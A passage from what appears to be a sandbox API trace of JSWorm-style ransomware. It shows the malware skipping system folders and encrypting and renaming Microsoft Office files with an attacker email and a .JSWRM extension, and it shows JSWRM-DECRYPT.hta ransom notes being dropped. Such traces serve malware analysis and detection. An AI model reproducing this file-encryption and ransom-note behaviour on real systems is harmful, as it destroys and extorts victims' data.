lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2WORD.XSL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBS2WORD.XSL", lpUsedDefaultChar=0x0) returned 12 [0143.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\VBS2WORD.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vbs2word.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.914] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6301) returned 1 [0143.914] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.914] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1890, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x1890, lpOverlapped=0x0) returned 1 [0143.916] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.916] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x1890, lpOverlapped=0x0) returned 1 [0143.916] CloseHandle (hObject=0x45c) returned 1 [0143.917] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\VBS2WORD.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vbs2word.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\VBS2WORD.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vbs2word.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.918] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831b012b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831b012b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x831d63af, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2=".") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="..") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="...") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="windows") returned -1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="recovery") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="perflogs") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="documents and settings") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="system volume information") returned 1 [0143.918] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="msocache") returned 1 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0143.918] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x839e2315, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2=".") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="..") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="...") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="windows") returned -1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="recovery") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="perflogs") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="documents and settings") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="system volume information") returned 1 [0143.918] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="msocache") returned 1 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0143.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0143.918] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x44e8517, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1fca0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VIEWMODL.DLL", cAlternateFileName="")) returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2=".") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="..") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="...") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="windows") returned -1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="recovery") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="perflogs") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="documents and settings") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="system volume information") returned 1 [0143.919] lstrcmpiW (lpString1="VIEWMODL.DLL", lpString2="msocache") returned 1 [0143.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIEWMODL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIEWMODL.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VIEWMODL.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIEWMODL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIEWMODL.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VIEWMODL.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.919] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x529dd34, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xec7ac8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VISBRGR.DLL", cAlternateFileName="")) returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2=".") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="..") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="...") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="windows") returned -1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="recovery") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="perflogs") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="documents and settings") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="system volume information") returned 1 [0143.921] lstrcmpiW (lpString1="VISBRGR.DLL", lpString2="msocache") returned 1 [0143.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRGR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRGR.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRGR.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRGR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRGR.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRGR.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.922] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4429858, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x198b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VISCOLOR.DLL", cAlternateFileName="")) returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2=".") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="..") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="...") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="windows") returned -1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="recovery") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="perflogs") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="documents and settings") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="system volume information") returned 1 [0143.922] lstrcmpiW (lpString1="VISCOLOR.DLL", lpString2="msocache") returned 1 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISCOLOR.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISCOLOR.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.922] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7f63b8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x7f63b8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x9012db, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x32848, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VISDLGU.DLL", cAlternateFileName="")) returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2=".") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="..") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="...") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="windows") returned -1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="recovery") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="perflogs") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="documents and settings") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="system volume information") returned 1 [0143.922] lstrcmpiW (lpString1="VISDLGU.DLL", lpString2="msocache") returned 1 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISDLGU.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISDLGU.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISDLGU.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISDLGU.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISDLGU.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISDLGU.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.923] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x522b72d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5277b31, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x248040, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VISICON.EXE", cAlternateFileName="")) returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2=".") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="..") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="...") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="windows") returned -1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="recovery") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="perflogs") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="documents and settings") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="$RECYCLE.BIN") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="system volume information") returned 1 [0143.923] lstrcmpiW (lpString1="VISICON.EXE", lpString2="msocache") returned 1 [0143.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISICON.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISICON.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISICON.EXE", lpUsedDefaultChar=0x0) returned 11 [0143.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISICON.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISICON.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISICON.EXE", lpUsedDefaultChar=0x0) returned 11 [0143.923] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0xa326fd, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Visio Content", cAlternateFileName="VISIOC~1")) returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2=".") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="..") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="...") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="windows") returned -1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="recovery") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="perflogs") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="documents and settings") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="$RECYCLE.BIN") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="system volume information") returned 1 [0143.923] lstrcmpiW (lpString1="Visio Content", lpString2="msocache") returned 1 [0143.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\jswrm-decrypt.hta")) returned 0xffffffff [0143.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.925] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.925] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0143.926] CloseHandle (hObject=0x45c) returned 1 [0143.926] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\jswrm-decrypt.hta")) returned 0x20 [0143.926] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c71d747, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1418, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0143.926] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.926] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c71d747, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.927] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.927] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.927] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4cce0ca, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cce0ca, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0143.927] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0143.927] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0143.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0143.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 